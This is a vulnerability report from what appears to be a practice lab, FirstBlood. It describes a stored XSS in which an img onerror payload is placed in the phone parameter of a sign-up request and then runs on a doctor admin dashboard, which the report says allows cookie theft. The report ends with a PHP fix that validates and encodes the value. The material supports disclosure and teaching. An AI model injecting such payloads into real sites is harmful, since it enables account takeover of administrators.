FirstBlood-#1010 Stored XSS on doctor admin dashboard
This issue was discovered on FirstBlood v3

On 2022-12-08, properlay Level 7 reported:

Hello, I found a stored XSS vulnerability on the doctor admin panel.

To reproduce:

  1. Visit

  2. When signing up for the HackerBack event, turn Burp Suite intercept ON

  3. Fill in the full name and phone number and click sign up

  4. On the intercepted request, change the phone parameter value to phone=1<img+src=x+onerror=alert(0)>

POST /api/hackerback.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

  5. Forward the request. The XSS will execute on the admin dashboard.


Can take over the doctor admin account by stealing the cookie.


FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
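As an added illustration of the root cause (example code, not FirstBlood's own), the PHP below shows the server-side validation and output encoding that an input type="tel" hint cannot replace; the function names, the phone pattern and the sample rows are assumptions.

```php
<?php
// Added example, not FirstBlood's code. Demonstrates why the browser's
// <input type="tel"> is not a control: the API must validate the value
// itself and the dashboard must encode it on output.

// Pattern the report describes: the phone value is trusted because the
// form field type was expected to constrain it, then echoed verbatim
// into the admin dashboard, so any HTML in it is rendered.
function render_signup_unsafe(array $row): string {
    return "<td>" . $row['name'] . "</td><td>" . $row['phone'] . "</td>";
}

// Hardened step 1: validate on the server. The pattern (optional '+',
// digits with spaces, dashes and parentheses, 7 to 20 characters) is an
// assumption for illustration; anything else is rejected before storage.
function validate_phone(string $phone): ?string {
    $phone = trim($phone);
    if (!preg_match('/^\+?[0-9][0-9 ()-]{5,18}[0-9]$/', $phone)) {
        return null;
    }
    return $phone;
}

// Hardened step 2: encode on output regardless of what is stored, so a
// value that slipped past validation (or was inserted another way) is inert.
function render_signup_safe(array $row): string {
    $enc = fn(string $v): string => htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<td>" . $enc($row['name']) . "</td><td>" . $enc($row['phone']) . "</td>";
}

// Constructed sample inputs: a legitimate number and the report's payload.
$legit   = '+1 (555) 010-2345';
$payload = '1<img src=x onerror=alert(0)>';

var_dump(validate_phone($legit));   // string(17) "+1 (555) 010-2345": accepted
var_dump(validate_phone($payload)); // NULL: rejected at /api/hackerback.php

// Even if the payload reached the database, the encoded render is harmless:
echo render_signup_safe(['name' => 'Test', 'phone' => $payload]), PHP_EOL;
// <td>Test</td><td>1&lt;img src=x onerror=alert(0)&gt;</td>
```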

